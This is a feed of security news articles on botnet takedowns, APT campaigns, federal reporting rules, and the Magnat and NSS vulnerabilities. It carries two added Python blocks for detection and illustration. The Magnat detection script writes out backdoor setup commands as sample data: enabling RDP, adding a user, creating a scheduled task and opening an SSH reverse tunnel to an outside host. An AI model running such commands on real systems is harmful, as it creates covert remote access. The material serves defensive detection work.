Decipher (https://decipher.sc)
Decipher is an independent editorial site that takes a practical approach to covering information security. Through news analysis and in-depth features, Decipher explores the impact of the latest risks and provides informative and educational material for readers curious about how security affects our world.
Tue, 07 Dec 2021 00:00:00 -0500 | en-us | info@decipher.sc (Amy Vazquez) | Copyright 2021

Google Disrupts Massive Glupteba Botnet
Dennis Fisher (dennis@decipher.sc) | https://duo.com/decipher/google-disrupts-massive-glupteba-botnet | Tue, 07 Dec 2021 00:00:00 -0500

After tracking the activities of the Glupteba botnet for several years, Google has made two moves to disrupt the botnet’s operations: filing a lawsuit against the alleged operators, and a technical takedown that removed servers used by the botnet and disabled more than 100 Google accounts associated with it.

The Glupteba botnet has included more than a million infected machines and it is part of a larger cybercrime enterprise that involves credential theft, credit card fraud, cryptomining, and other malicious activities. Google researchers have been following the botnet’s rise, and a few months ago discovered some information in Glupteba binaries that led to a deeper investigation and the takedown effort and lawsuit.

“While analyzing Glupteba binaries, our team identified a few containing a git repository URL: ‘git.voltronwork.com’. This finding sparked an investigation that led us to identify, with high confidence, multiple online services offered by the individuals operating the Glupteba botnet. These services include selling access to virtual machines loaded with stolen credentials (dont[.]farm), proxy access (awmproxy), and selling credit card numbers (extracard) to be used for other malicious activities such as serving malicious ads and payment fraud on Google Ads,” Shane Huntley and Luca Nagy of the Google Threat Analysis Group said.

The lawsuit alleges that two Russian men, Dmitry Starovikov and Alexander Filippov, operated the botnet, with help from other unnamed defendants. Google alleges that the operators’ schemes infringed on the company’s trademarks, and violated the Computer Fraud and Abuse Act, the Racketeering Influenced and Corrupt Organizations Act and other U.S. statutes.

The Glupteba botnet has some unique characteristics that have made it particularly resilient and difficult to disrupt. The main difference between Glupteba and other bot networks is that Glupteba has backup command-and-control mechanisms located on the Bitcoin blockchain that are designed to serve as failsafes if the main C2 servers are offline.

“Unlike conventional botnets, the Glupteba botnet does not rely solely on predetermined domains to ensure its survival. Instead, when the botnet’s C2 server is interrupted, Glupteba malware is hard-coded to ‘search’ the public Bitcoin blockchain for transactions involving three specific Bitcoin addresses that are controlled by the Glupteba Enterprise,” the lawsuit says.

“From time to time, the Glupteba Enterprise executes transactions in those addresses, and as part of those transactions, the Glupteba Enterprise leaves in the blockchain the location of the domain for a backup C2 Server.”

One of the key money-making avenues for the Glupteba operators is the sale of access to Google accounts. After infecting a new machine, usually through a fake download link for an app, the malware steals the victim’s Google account credentials and sends them back to the C2 servers. Rather than selling those stolen credentials directly to other criminals, the Glupteba operators set up a virtual machine, load the credentials for a given account into a browser on that VM, and then sell access to the account through a site called Dont.farm.

“Dont.farm’s customers pay the Glupteba Enterprise in exchange for the ability to access a browser that is already logged into a victim’s stolen Google account. Once granted access to the account, the Dont.farm customer has free rein to use that account however they desire, including buying advertisements and launching fraudulent ad campaigns, all without the true account owner’s knowledge or authorization,” the lawsuit says.

The Glupteba operators also allegedly ran credit card fraud schemes and ad fraud operations using Google AdWords, as well as malicious cryptomining operations, taking advantage of the processing power of infected machines.

“Unfortunately, Glupteba’s use of blockchain technology as a resiliency mechanism is notable here and is becoming a more common practice among cyber crime organizations. The decentralized nature of blockchain allows the botnet to recover more quickly from disruptions, making them that much harder to shut down. We are working closely with industry and government as we combat this type of behavior, so that even if Glupteba returns, the internet will be better protected against it,” said Royal Hansen, vice president of security, and Halimah DeLaine Prado, general counsel at Google.

We don’t just plug security holes, we work to eliminate entire classes of threats for consumers and businesses whose work depends on the Internet.

Microsoft Seizes Sites From Chinese APT Group
Lindsey O’Donnell-Welch (lindsey@decipher.sc) | https://duo.com/decipher/microsoft-seizes-sites-from-chinese-apt-group | Tue, 07 Dec 2021 00:00:00 -0500

Microsoft has cracked down on a China-based hacking group that's behind widespread cyberattacks on government agencies, think tanks and human rights organizations in 29 countries, including the U.S.

The tech company said on Monday it seized 42 websites that were used by the threat group, which is called Nickel, with the aim of cutting off attackers’ access to victims and preventing them from using the sites to execute attacks.

“Our disruption will not prevent Nickel from continuing other hacking activities, but we do believe we have removed a key piece of the infrastructure the group has been relying on for this latest wave of attacks,” said Tom Burt, corporate vice president of Customer Security and Trust with Microsoft on Monday.

The Nickel threat group (also known as APT15, Vixen Panda, KE3CHANG, Royal APT and Playful Dragon) has launched highly sophisticated attacks since at least 2010, infecting victims with malware that steals data, facilitates intrusion and conducts surveillance.

Typically, attackers initially infected victims through compromised credentials obtained with spear-phishing; via compromised, third-party virtual private network (VPN) suppliers; or by exploiting known vulnerabilities on unpatched Exchange Server or SharePoint systems. The APT has leveraged several malware families, including the Okrum backdoor, MirageRAT and the Ketrican malware.

Nickel's targets have ranged broadly from diplomatic organizations and ministries of affairs to members of organizations that attempt to maintain world peace. Researchers have observed a frequent correlation between the threat group’s targets and China’s geopolitical interests.

Microsoft on Dec. 2 filed pleadings with the U.S. District Court for the Eastern District of Virginia to take control of the attacker-owned sites, arguing in a complaint that the APT’s activities “continue to cause irreparable injury to Microsoft, its customers, and the public” and that the attacks have caused a $5,000 loss to Microsoft during a one-year period. The complaint was filed in that district because that is where the domains maintained by the actor were registered and where some of the victims were targeted, according to Microsoft.

These types of seizures both help Microsoft obtain control of the malicious websites, and also redirect traffic from the sites to Microsoft servers, giving the company better insight into the activities of the APT.

“This is definitely a significant disruption,” said Jake Williams, co-founder and CTO at incident response company BreachQuest. “While the domains can be replaced relatively quickly, multiple tool signatures were released and those will require more effort to replace. Organizations with appropriate telemetry, such as DNS or web proxy logs, can look back historically to determine if they've been targeted as well. As disruption operations go, taking over command and control domains is a worst case scenario.”

Microsoft, like other tech companies such as Google, has previously relied on this type of legal strategy to disrupt cybercriminal operations. To date, Microsoft has filed 24 similar lawsuits that have allowed it to take down 10,000 malicious cybercriminal websites and 600 nation-state actor websites, including infrastructure used by Trickbot, Zeus, Citadel and the Necurs botnet. Google has also disrupted various campaigns and infrastructure associated with cybercriminals, on Tuesday announcing it had disrupted the Glupteba Windows malware.

Cloud Service Provider Compromises Use CeeLoader Malware
Lindsey O’Donnell-Welch (lindsey@decipher.sc) | https://duo.com/decipher/solarwinds-attacker-targets-cloud-providers-with-ceeloader-malware | Mon, 06 Dec 2021 00:00:00 -0500

A series of campaigns, with links to the threat actor behind the SolarWinds supply-chain intrusion, have been targeting cloud service providers with a new malware loader variant called CeeLoader.

Researchers with Mandiant in a Monday analysis said they identified two distinct clusters of activity, UNC3004 and UNC2652, which they associate with UNC2452 (also known as Nobelium or APT29), the group behind the SolarWinds supply-chain hack. However, while researchers said it was “plausible” that these are the same group, they said they don't have enough evidence to make this determination with high confidence. The activity clusters utilized a variety of tactics and tools, including CeeLoader, in attacks that aimed to steal data "relevant to Russian interests" from businesses and government entities globally.

"The threat actors continue to innovate and identify new techniques and tradecraft to maintain persistent access to victim environments, hinder detection, and confuse attribution efforts," said Luke Jenkins, Sarah Hawley, Parnian Najafi and Doug Bienstock, researchers with Mandiant.

CeeLoader, which is written in the C programming language and supports shellcode payloads that are executed in memory, was observed being installed by the Cobalt Strike Beacon malware as a scheduled task that, once the loader was downloaded, ran as SYSTEM at login on specific victim systems. The loader, which was first identified in the third quarter of 2021, is a variant of a malware family tracked by Microsoft as VaporRage.

While the two share some similarities in their functionalities, which are to obtain second-stage encrypted payloads, CeeLoader contains a number of changes that make analysis more difficult, said Jenkins. The loader's code is obfuscated between large blocks of junk code with meaningless calls to the Windows API.

"CeeLoader uses AES-256 to encrypt payloads, whereas VaporRage uses a basic XOR algorithm," said Jenkins. "Both payloads execute shellcode that is loaded directly into memory and in both cases, the malware has been seen to load Beacon. Both samples also appear to be executed by rundll32, a Windows binary for loading DLLs from disk. Additionally, in both samples, a specific export is usually called to execute the sample; this is usually a technique by the threat actor to bypass automated sandboxes."

CeeLoader was uncovered in attacks targeting Microsoft Azure Active Directory accounts for various cloud services providers. Microsoft in October warned that UNC2452 was targeting these types of solution providers and resellers, which assist end users in deploying, customizing and managing cloud services and other technologies. The compromise of these types of companies would allow attackers to move laterally across impacted cloud environments in order to then gain access to downstream government and think tank customers, enabling further attacks, said Microsoft.

The methods of initial access varied between attacks. In one attack, the threat actor compromised a local VPN account to perform reconnaissance and gain access to the cloud service provider's (CSP) environment. In another campaign, threat actors gained access to the organization’s Microsoft 365 account with a stolen session token.

“Mandiant analyzed the workstations belonging to the end user and discovered that some systems had been infected with Cryptbot, an info-stealer malware, shortly before the stolen session token was generated,” said researchers. "Mandiant observed that in some cases the user downloaded the malware after browsing to low reputation websites offering free, or cracked, software."

Post-Compromise Activities

Once they had accessed the victim environments, the threat group compromised accounts with Azure AD roles, specifically targeting a feature called Admin On Behalf Of (AOBO). This feature gives specific CSP tenant users access to Azure subscriptions in the customer’s tenants, meaning they have complete control over all resources within the Azure subscription. Once the threat actor obtained these privileges, they executed commands with NT AUTHORITY\SYSTEM privileges within Azure VMs, utilizing the Azure Run Command feature. This feature allows users to run PowerShell scripts within an Azure VM without the need for Windows credentials that are valid on the VM itself, said researchers.

From there, the threat actor used RDP to pivot between systems, performed reconnaissance, distributed the Beacon malware around the network (ultimately used to install CeeLoader), ran native Windows commands for credential harvesting and attempted to dump the Active Directory database (ntds.dit) using the built-in ntdsutil.exe command.

Researchers also observed attackers leveraging various tactics to make the intrusion more difficult to defend against. In one incident, they used different compromised accounts for separate malicious functions, such as lateral movement, reconnaissance, and more. Researchers believe that this technique was used to decrease the likelihood that detecting one activity could expose the entire scope of the intrusion.

“Mandiant found evidence that the actor compromised multiple accounts and used one for the sole purpose of reconnaissance, while the others were reserved for lateral movement within the organization,” said researchers. “Mandiant previously observed this threat actor using strict operational security to use specific accounts and systems in victim environments for activities that are often higher risk, such as data theft and large-scale reconnaissance.”

As part of the threat actor’s infrastructure, researchers also found the actor hosting second-stage payloads as encrypted blobs on compromised, legitimate websites running WordPress. Attackers also utilized residential IP proxy services and geo located infrastructure when communicating with compromised victims, which researchers said "can make it very difficult for investigators to differentiate between normal user activity and the threat actor's activity.”

“These tactics showcase the complexity of the attacker's operations and are rarely seen executed by other threat actors,” said researchers.

UNC2452, which has previously been associated with several malware families, including Sunburst, Teardrop, and the FoggyWeb backdoor, continues to infect companies worldwide. On Monday, CERT-France released details on a number of spear-phishing campaigns by the threat actor directed against French entities since February 2021. Mandiant researchers said the intrusion activity demonstrates a “well-resourced threat actor set operating with a high level of concern for operational security.” The group’s abuse of third parties (in this case, CSPs) also gives it access to a wider scope of victims in individual attacks, said researchers.

“Though Mandiant cannot currently attribute this activity with higher confidence, the operational security associated with this intrusion and exploitation of a third party is consistent with the tactics employed by the actors behind the SolarWinds compromise and highlights the effectiveness of leveraging third parties and trusted vendor relationships to carry out nefarious operations,” said researchers.

New Guidance Pushes Federal Agencies Toward Automated Incident Reporting
Dennis Fisher (dennis@decipher.sc) | https://duo.com/decipher/new-guidance-pushes-federal-agencies-toward-automated-incident-reporting | Mon, 06 Dec 2021 00:00:00 -0500

The White House is changing the way that it requires federal agencies to report security incidents in an effort to automate the process and make incident reporting simpler and more efficient.

Under new guidance issued by the Office of Management and Budget Monday, the Cybersecurity and Infrastructure Security Agency (CISA) will be required to develop a strategy to increase the usage of automated reporting mechanisms, specifically those that use machine-readable data, by the spring of next year. By the end of 2022, CISA will have to give OMB real-time access to incident data. The requirement is included in a broader memorandum issued by OMB that is part of an initiative to modernize and mature the federal security infrastructure and policies.

Currently, nearly half of security incidents at federal civilian agencies are reported manually through the US-CERT website, which requires significant work on the part of analysts. Automated reporting systems are more efficient and allow for quicker response and notification to other agencies that may be affected by the same incident.

“To ensure accurate reporting of information, agencies have historically needed to painstakingly and manually compare their incidents with US-CERT’s account. By late spring of 2022, CISA, in coordination with OMB, will develop a strategy, including any technical standards, to modernize and improve the use of machine-readable incident data and indicators in a manner that communicates directly with agency SOCs and/or incident reporting systems. CISA will provide OMB real-time access to incident information no later than December 2022,” the memorandum says.

“FISMA data collection has long remained an overly manual process that often leads agencies to create complicated spreadsheets and internal processes to respond to questions. As the Federal information security apparatus matures, so should its reporting mechanisms. OMB is emphasizing automation and the use of machine-readable data to speed up reporting, reduce agency burden, and improve outcomes.”

The new guidance is designed to help accelerate the process of modernizing the processes and systems that federal agencies use. In May, President Joe Biden issued an Executive Order that requires federal agencies to make a number of improvements to their cybersecurity infrastructure, including moving to a zero trust architecture. The OMB memorandum is meant as a companion to the EO and much of the focus is on automation and providing better metrics to measure the effectiveness of security controls and programs. One of the new requirements is that CISA work with OMB and the National Institute of Standards and Technology to improve the standards for using machine-readable data as part of the Continuous Diagnosis and Mitigation (CDM) program.

“By April 2022, CISA, in coordination with OMB and NIST, will develop a strategy to continue to evolve machine-readable data standards for cybersecurity performance and compliance data through CDM (or a successor process). This strategy will include a set of metrics (supplementing the existing CIO metrics) based on NIST Standards (e.g., NIST SP 800-53) for controls that can be reported in an automated manner, and will set forth a timeline for when these metrics will be collected automatically,” the guidance says.

Decipher Podcast: Source Code 12/3
Lindsey O’Donnell-Welch (lindsey@decipher.sc) | https://duo.com/decipher/decipher-podcast-source-code-12-3 | Fri, 03 Dec 2021 08:00:00 -0500

APT Groups Exploiting Critical Flaw in ManageEngine ServiceDesk Plus
Dennis Fisher (dennis@decipher.sc) | https://duo.com/decipher/apt-groups-exploiting-critical-flaw-in-manageengine-servicedesk-plus | Fri, 03 Dec 2021 00:00:00 -0500

APT groups are targeting a months-old remote code execution vulnerability in Zoho’s ManageEngine ServiceDesk Plus help desk software in order to upload malicious files, drop webshells, and use the compromised servers as footholds to move laterally on target networks.

The vulnerability (CVE-2021-44077) is in versions of ManageEngine ServiceDesk Plus before version 11306 and it allows an attacker to bypass the authentication mechanism for the application and upload whatever files they choose. Zoho released an updated version that addressed the vulnerability in September, and published an updated advisory on Nov. 22 warning customers that active exploits against the flaw were underway. On Thursday, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) warned that their specialists have seen APT actors exploiting the vulnerability.

“The FBI and CISA assess that advanced persistent threat (APT) cyber actors are among those exploiting the vulnerability. Successful exploitation of the vulnerability allows an attacker to upload executable files and place webshells, which enable the adversary to conduct post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files,” the advisory says.

The ManageEngine ServiceDesk Plus application is an IT help desk and asset management tool used in enterprises across a wide range of industries. The vulnerability only affects on-premises deployments, and not the cloud version of the application.

In the advisory, CISA and FBI said they have observed APT groups using a number of different tactics and techniques after exploiting the ManageEngine ServiceDesk Plus vulnerability, including writing webshells to disk in order to maintain persistence, and adding and deleting new accounts. Attackers also are stealing copies of the Windows Active Directory databases and registry hives. The attackers are also spending some time cleaning up after themselves after compromising a server.

“Confirming a successful compromise of ManageEngine ServiceDesk Plus may be difficult—the attackers are known to run clean-up scripts designed to remove traces of the initial point of compromise and hide any relationship between exploitation of the vulnerability and the webshell,” the advisory says.

Enterprises that run ManageEngine ServiceDesk Plus should upgrade to version 11306 as soon as possible.

TSA Issues Security Rules For Rail Operators
Lindsey O’Donnell-Welch (lindsey@decipher.sc) | https://duo.com/decipher/tsa-issues-security-rules-for-rail-operators | Fri, 03 Dec 2021 00:00:00 -0500

New cybersecurity requirements from the Transportation Security Administration (TSA) give freight railroads, passenger rail and rail transit operators a 24-hour deadline for reporting security incidents.

Starting on Dec. 31, “high-risk” operators and owners across the rail sector must take a number of steps to bolster the cybersecurity of their systems. They must designate a cybersecurity coordinator, implement security incident response plans with the intent of reducing the risk of operational disruption, complete a vulnerability assessment to identify potential security holes in their systems and report cybersecurity incidents to the Cybersecurity and Infrastructure Security Agency (CISA) within 24 hours.

The incidents that must be reported include unauthorized access of IT or operational technology systems, discovery of malicious software or denial-of-service attacks on these systems, and “any other cybersecurity incident that results in operational disruption.”

“These new cybersecurity requirements and recommendations will help keep the traveling public safe and protect our critical infrastructure from evolving threats,” said Secretary of Homeland Security Alejandro Mayorkas in a statement. “DHS will continue working with our partners across every level of government and in the private sector to increase the resilience of our critical infrastructure nationwide.”

In addition, the TSA has released voluntary guidance recommending that smaller and “lower-risk” rail operators implement the same measures. Airline and airport operators will also be required to appoint a cybersecurity coordinator and report breaches within 24 hours.

Cyberattacks in the Transportation Sector

The upcoming mandates, first detailed in October, are part of a series of sprints that were announced by Mayorkas earlier this year. These sprints, which came on the heels of the Colonial Pipeline cyberattack and the ensuing executive order for securing critical infrastructure from the Biden administration, include initiatives from the DHS around ransomware, industrial control systems and more. Mayorkas in March said that the “Cybersecurity and Transportation” sprint would focus on increasing the security of transportation systems, including aviation, rail, pipelines, and the marine transport system.

The sprint also comes on the heels of a slew of cyberattacks targeting various transportation agencies over the years, including the New York Metropolitan Transportation Authority, the Santa Clara Valley Transportation Authority, the Ann Arbor Area Transportation Authority and the Toronto Transit Commission. An IBM X-Force industry profile found that the transportation industry was the ninth most attacked sector in 2020, experiencing 5.1 percent of all attacks in the top ten industries; and the industry was also ranked the tenth most costly sector for experiencing a data breach.

Cybercriminals behind these attacks, which have included sophisticated actors like Chinese nation-state actor APT10 or Iran-linked ITG07, are attempting to steal data that can be monetized or launch ransomware attacks, with researchers pointing to recent claims on underground forums by attackers that they have access to networks for companies operating air, ground and maritime cargo transport.

Cyberattacks on the transportation sector have had varying impacts. The cyberattack on the Ann Arbor Area Transportation Authority, for instance, caused temporary disruptions to real-time bus information and other information systems, but bus service continued to operate. A ransomware attack on the Santa Clara Valley Transportation Authority, meanwhile, reportedly resulted in a days-long shutdown of many computer systems across the agency, and, while light rails remained operational, certain functions like real-time arrival data went down.

New Rail Mandates

During a Thursday House Committee hearing, government representatives stressed that transportation organizations continue to struggle with highly complex, and in some cases archaic, systems across traffic management, control and signaling, station operation and more. At the same time, these organizations must juggle securing operating systems, applications and mobile devices on various networks, as well as various supply-chain issues.

“I think the bottom line is we’re constantly operating behind the eight-ball,” said Nick Marinos, director of the U.S. Government Accountability Office’s (GAO) Information Technology and Cybersecurity team, during the hearing.

An October audit found that the Department of Transportation (DOT) has “yet to address longstanding cybersecurity deficiencies related to its practices for protecting its mission-critical systems from unauthorized access, alteration, or destruction.”

The audit found that the DOT did not maintain complete inventories of all its systems, a practice essential to risk management; it also did not test the security controls for systems and did not consistently remediate flaws.

“The reality is that it just takes one successful cyberattack to take down an organization and each federal agency, as well as owners and operators of critical infrastructure have to protect themselves against countless numbers of attacks,” said Marinos. “And so in order to do that, we need our federal government to be operating in the most strategic way possible.”

Rail Industry Response

Since announcing the directives in October, the TSA (which is part of the DHS) has sought input from industry stakeholders and federal partners, including CISA. The directives were initially met with pushback from a group of Republican senators, as well as those within the rail industry, such as Thomas Farmer, assistant vice president of security with the Association of American Railroads (AAR).

In a November Committee of Transportation and Infrastructure hearing, Farmer argued that the directives would lead to “erroneous perceptions” that the rail sector did not have effective security measures and that the directives posed several implementation challenges. The AAR also said that security assessments have been conducted on a recurring basis, and that railroads have already been reporting "significant cyber threats, incidents and security concerns" to the DOT since 2014.

“Railroads and rail industry organizations have not been advised by federal officials of any prevailing emergency conditions that justify use of this authority, despite the many opportunities available,” said Farmer during the hearing.

In a Thursday statement, the AAR said the rail industry has had “productive consultations” with agency officials and that a “number of the industry’s most significant concerns have been addressed."

“For the better part of two decades, railroads have thoughtfully coordinated with each other and government officials to enhance information security, which has proven to be an effective, responsive way of addressing evolving threats,” said AAR President and CEO Ian Jefferies in the statement.

Malicious Chrome Extension, Backdoor Uncovered in Malware Campaign
Lindsey O’Donnell-Welch (lindsey@decipher.sc) | https://duo.com/decipher/malicious-chrome-extension-backdoor-uncovered-in-malware-campaign | Thu, 02 Dec 2021 00:00:00 -0500

Researchers have detailed a threat actor, which they call Magnat, deploying a new backdoor and undocumented malicious Google Chrome extension in malware attacks that date back to 2018.

Magnat, a name that stems from the username in the build path of the campaign’s malware, has been using fake software installers as a lure to convince users to execute malware on their system, with filenames that include viber-25164.exe and wechat-35355.exe. Researchers with Cisco Talos said on Thursday that they believe the threat actor is stealing credentials with the intent of selling them on underground forums.

"Since this threat delivers multiple different payloads, including information stealers, it can pose a significant threat to enterprises," said Tiago Pereira, technical lead of security research with Cisco Talos. "We have seen the credentials stolen by these stealers act as an initial infection point for larger attacks, including ransomware incidents."

Researchers assessed that the campaign uses malvertising - the use of malicious advertisements, which typically occurs through injecting malicious code into ads - as an initial means to reach users who might be interested in downloading popular software. Most victims targeted have been in Canada, the U.S. and Australia, with about 50 percent of infections in Canada.

“This type of threat can be very effective and requires that several layers of security controls are in place, such as, endpoint protection, network filtering and security awareness sessions,” Pereira said.

Backdoor and Malicious Chrome Extension

Once run, the fake installers execute a loader (typically either an .exe or .iso file) that pretends to be a software installer. In reality, the loader creates several files and deploys various commands that lead to the execution of three malware components. One of these is a malicious Google Chrome extension, which researchers called “MagnatExtension.”

The browser extension, which includes samples dating back to August 2018, is delivered via an executable (not from the Chrome Extension store) with the sole function of preparing the system and installing the extension. Once it has been installed, the extension shows up for victims as “Google’s Safe Browsing” and purports to be technology that examines URLs to look for unsafe websites. The extension code, which is obfuscated using function redirects, encrypted substitution arrays, function wrappers and string encoding, has several web browser information-stealing capabilities.

These include a keylogger that captures the keys typed by victims and a form grabber that retrieves credentials from web data forms. The extension also grabs screenshots of passwords and swipes browser cookies.

The campaign also utilizes a backdoor that researchers called “MagnatBackdoor.” This is an AutoIt-based installer that configures the targeted system for stealthy Remote Desktop Protocol (RDP) access, adds a new user and sets a scheduled task to periodically ping the command-and-control (C2) server.

“As a result of this installer's actions there is a way for the attacker to access the system remotely via RDP, which is why we call it a backdoor,” said researchers.

The backdoor also creates an outbound SSH tunnel to a remote server, which allows attackers to forward the local RDP port to be used for remote access. Researchers said that the motives for deploying the RDP backdoor are unclear. However, “the most likely are the sale of RDP access, the use of RDP to work around online service security features based on IP address or other endpoint installed tools or the use of RDP for further exploitation on systems that appear interesting to the attacker,” said Pereira.
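The four steps attributed to MagnatBackdoor above (enable RDP, add a user, create a scheduled task, open an outbound SSH tunnel that forwards the RDP port) are each unremarkable on their own, which is why a detection should correlate them per host. The Python below is an added example, not detection content from Talos; the command lines its rules match are assumptions about how a Windows installer could perform those steps, and the process-creation events are constructed for the example (198.51.100.0/24 is a documentation range).

```python
import re
from collections import defaultdict
from typing import Dict, List, Set

# One rule per step the article attributes to the backdoor. The exact commands are
# assumptions (how an installer *could* do each step), not indicators from the report.
RULES = [
    ("rdp_enabled", re.compile(r"fDenyTSConnections\b.*?/d\s+0\b", re.I)),
    ("user_added", re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("task_created", re.compile(r"\bschtasks(?:\.exe)?\s+/create\b", re.I)),
    # ssh -R forwards a remote port back to the local RDP port (3389): a reverse tunnel
    ("rdp_reverse_tunnel", re.compile(
        r"\bssh(?:\.exe)?\b.*\s-R\s*\S*:(?:127\.0\.0\.1|localhost):3389\b", re.I)),
]

# Constructed process-creation events: timestamp|host|user|command line
SAMPLE_EVENTS = [
    '2021-12-02T10:00:01|WS01|alice|reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    '2021-12-02T10:00:02|WS01|alice|net user svc_support Pa55w0rd! /add',
    '2021-12-02T10:00:03|WS01|alice|schtasks /create /sc minute /mo 10 /tn "Update Check" /tr "C:\\ProgramData\\upd\\ping.exe" /ru SYSTEM /f',
    '2021-12-02T10:00:04|WS01|alice|C:\\ProgramData\\upd\\ssh.exe -N -R 43389:127.0.0.1:3389 -i C:\\ProgramData\\upd\\id_rsa tunnel@198.51.100.7',
    # Routine admin work on another host: one step alone should not alert
    '2021-12-02T11:15:00|WS02|bob|schtasks /create /sc daily /tn "Backup" /tr "C:\\Tools\\backup.cmd"',
    '2021-12-02T11:16:00|WS02|bob|ssh.exe -L 8080:localhost:80 bob@198.51.100.9',
]


def match_event(cmdline: str) -> Set[str]:
    """Labels of every rule that fires on one command line."""
    return {label for label, rx in RULES if rx.search(cmdline)}


def correlate(events: List[str]) -> Dict[str, Set[str]]:
    """Collect which backdoor-setup steps were seen on each host."""
    seen: Dict[str, Set[str]] = defaultdict(set)
    for line in events:
        _ts, host, _user, cmdline = line.split("|", 3)
        seen[host] |= match_event(cmdline)
    return dict(seen)


def alert_hosts(events: List[str], min_steps: int = 3) -> List[str]:
    """Hosts on which at least min_steps distinct setup steps were observed."""
    return sorted(h for h, steps in correlate(events).items() if len(steps) >= min_steps)


if __name__ == "__main__":
    for host, steps in correlate(SAMPLE_EVENTS).items():
        print(host, sorted(steps))
    print("alert:", alert_hosts(SAMPLE_EVENTS))
```

In practice the events would come from Sysmon event ID 1 or Windows 4688 with command-line auditing enabled, and the correlation window would be bounded in time; the threshold of three steps is a starting point, not a tuned value.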

Continual Development

Researchers observed widely-known and documented commodity password stealers being deployed as part of the attack to collect system credentials.

The types of password stealers have varied over time, suggesting constant development by the attackers. From 2018 to late 2019, the Azorult password stealer was deployed. However, the use of Azorult suddenly stopped in 2020, which researchers believe may have been a consequence of Chrome 80 cracking down on Azorult’s password stealing abilities. More recent attacks leveraged the Vidar Stealer, Gozi and the Redline Stealer, suggesting that attackers have been testing replacements for Azorult.

Researchers warn that attackers will continue to develop and improve this campaign with the purpose of stealing and selling credentials. The discovered malware families "have been subject to constant development and improvement by their authors - this is likely not the last we hear of them," said Pereira.

<![CDATA[Mozilla Fixes Critical Flaw in NSS Crypto Library]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/mozilla-fixes-critical-flaw-in-nss-crypto-library https://duo.com/decipher/mozilla-fixes-critical-flaw-in-nss-crypto-library Thu, 02 Dec 2021 00:00:00 -0500

Mozilla has released a fix for a critical memory corruption flaw in its NSS cryptographic library that could have allowed an attacker to execute arbitrary code on vulnerable applications simply by supplying an overly large digital signature to the app.

Network Security Services (NSS) is an open-source library developed by Mozilla that is used for a variety of functions across a wide range of applications. Although Mozilla says Firefox is not affected by this bug, NSS is used for signature verification in Thunderbird, LibreOffice and many other applications. Researcher Tavis Ormandy of Google’s Project Zero discovered the vulnerability (CVE-2021-43527) with a custom fuzzer he wrote and reported the flaw to Mozilla, which released a fix for the bug in NSS 3.73 this week.

When a user supplies a digital signature encoded with ASN.1 to an application using NSS for verification, NSS creates a structure to store the signature. This is where the problem lies.

“The maximum size signature that this structure can handle is whatever the largest union member is, in this case that’s RSA at 2048 bytes. That’s 16384 bits, large enough to accommodate signatures from even the most ridiculously oversized keys,” Ormandy said in a post explaining the flaw.

“Okay, but what happens if you just....make a signature that’s bigger than that? Well, it turns out the answer is memory corruption. Yes, really. The untrusted signature is simply copied into this fixed-sized buffer, overwriting adjacent members with arbitrary attacker-controlled data.”
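The bug class Ormandy describes is a length taken from attacker-supplied ASN.1 and trusted during a copy into a fixed-size buffer. The Python below is an added illustration, not NSS's own C code: it decodes a DER tag and length (rejecting the non-minimal and indefinite forms DER forbids), models the fixed-size union as a byte buffer with a few "adjacent" bytes after it, and shows the unchecked copy spilling into those neighbours while the checked copy refuses the oversized signature. The 2048-byte limit is the figure quoted above; the struct layout, the 16-byte neighbour region and the sample signatures are assumptions made for the example.

```python
from typing import Tuple

MAX_SIG_BYTES = 2048   # largest union member per the quoted post: a 16384-bit RSA signature
ADJACENT_BYTES = 16    # assumed stand-in for the struct members that follow the union


def parse_der_tlv(buf: bytes) -> Tuple[int, int, int]:
    """Decode one DER tag/length; return (tag, length, offset of the value bytes)."""
    if len(buf) < 2:
        raise ValueError("truncated header")
    tag, first = buf[0], buf[1]
    if first < 0x80:                              # short form: the byte is the length
        length, off = first, 2
    elif first in (0x80, 0xFF):                   # indefinite / reserved: not valid DER
        raise ValueError("invalid length octet")
    else:                                         # long form: low 7 bits = byte count
        n = first & 0x7F
        if len(buf) < 2 + n:
            raise ValueError("truncated length")
        length = int.from_bytes(buf[2:2 + n], "big")
        if buf[2] == 0 or length < 0x80:          # DER requires the minimal encoding
            raise ValueError("non-minimal length")
        off = 2 + n
    if len(buf) < off + length:
        raise ValueError("value shorter than declared length")
    return tag, length, off


class SignatureStruct:
    """Models C `struct { union { u8 rsa[2048]; ... } u; /* adjacent members */ }`."""
    def __init__(self) -> None:
        self.mem = bytearray(MAX_SIG_BYTES + ADJACENT_BYTES)

    def adjacent(self) -> bytes:
        return bytes(self.mem[MAX_SIG_BYTES:])


def copy_signature_unchecked(dst: SignatureStruct, der: bytes) -> int:
    """The bug pattern: copy `length` bytes without comparing it to the buffer size."""
    _tag, length, off = parse_der_tlv(der)
    n = min(length, len(dst.mem))                 # a real memcpy would run past the struct too
    dst.mem[:n] = der[off:off + n]                # bytes beyond MAX_SIG_BYTES hit the neighbours
    return length


def copy_signature_checked(dst: SignatureStruct, der: bytes) -> int:
    """The fix: bound the untrusted length before any copy happens."""
    _tag, length, off = parse_der_tlv(der)
    if length > MAX_SIG_BYTES:
        raise ValueError(f"signature of {length} bytes exceeds {MAX_SIG_BYTES}-byte buffer")
    dst.mem[:length] = der[off:off + length]
    return length


def der_encode(tag: int, payload: bytes) -> bytes:
    """Build a DER TLV with the minimal length encoding the parser insists on."""
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + payload


def adjacent_after_unchecked_copy(der: bytes) -> bytes:
    """What the neighbouring members look like after the buggy copy."""
    s = SignatureStruct()
    copy_signature_unchecked(s, der)
    return s.adjacent()


def try_checked_copy(der: bytes) -> str:
    """Outcome of the fixed path: 'ok', 'oversized' or 'malformed'."""
    try:
        copy_signature_checked(SignatureStruct(), der)
        return "ok"
    except ValueError as e:
        return "oversized" if "exceeds" in str(e) else "malformed"


if __name__ == "__main__":
    big = der_encode(0x04, b"A" * 2060)           # constructed 2060-byte "signature"
    print("unchecked, adjacent bytes:", adjacent_after_unchecked_copy(big))
    print("checked:", try_checked_copy(big))
```

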